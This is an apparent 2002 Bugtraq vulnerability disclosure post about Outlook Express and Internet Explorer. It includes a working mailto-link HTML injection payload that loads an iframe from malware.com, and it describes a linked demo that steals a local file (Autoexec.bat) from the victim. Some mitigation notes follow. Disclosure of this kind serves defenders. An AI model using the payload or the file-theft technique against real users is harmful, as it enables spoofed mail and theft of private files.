From: http-equiv@excite.com [http-equiv@malware.com]
Sent: Sunday, April 14, 2002 5:59 PM
To: bugtraq@securityfocus.com; NTBugtraq@listserv.ntbugtraq.com
Cc: vuln-dev@securityfocus.com
Subject: More fun with html mail: Outlook Express, Internet Explorer,
Other etc

Sunday, April 14, 2002

1. Not Possible

Technically it cannot be possible to create an html mail message from 
a mailto url scheme without user input. However shoe-horning html in 
through insertion of script tags does make it possible. Default 
installation of Outlook Express and probably Outlook, is 'mail 
sending format: html':

<a href="mailto: freak@bloatedcorp.com
?cc=contest@bloatedcorp.com
&subject=Million Dollar Contest
&body=<script></script>
<iframe src=http://www.malware.com'>">
 contest@bloatedcorp.com </a>

This is not a good idea.

Working Example:

http://www.malware.com/$illine$$.html

Note: this is an 8th month 
old 'thing':http://www.securityfocus.com/bid/3334

2. EVEN WORSE:

Trivial file theft using Outlook Express, maybe Outlook. Instead of 
delivering files to the target computer, we rather take files from 
the target computer. With a bit of Idiot Engineering, we reverse the 
process as detailed here: http://www.securityfocus.com/bid/1221 and 
here: http://www.kb.cert.org/vuls/id/31994. 

Note: now almost 24 months old.

 
Working Example:

This will pluck and send your Autoexec.bat from a default Windows 
installation. Targeted computers with specific files can prove more 
lucrative.

http://www.malware.com/idiot$.html

Notes:

1. Outlook Express 6 default mail is in the 'restricted zone'. 
Outlook Express 5.5 isn't. Disable Active X and all those other 
things.

2. Do not send 'unknown' webmasters entire web pages despite how 
tempting the request is. 

3. Scraping the bottom of the barrel.

End Call.

-- 
http://www.malware.com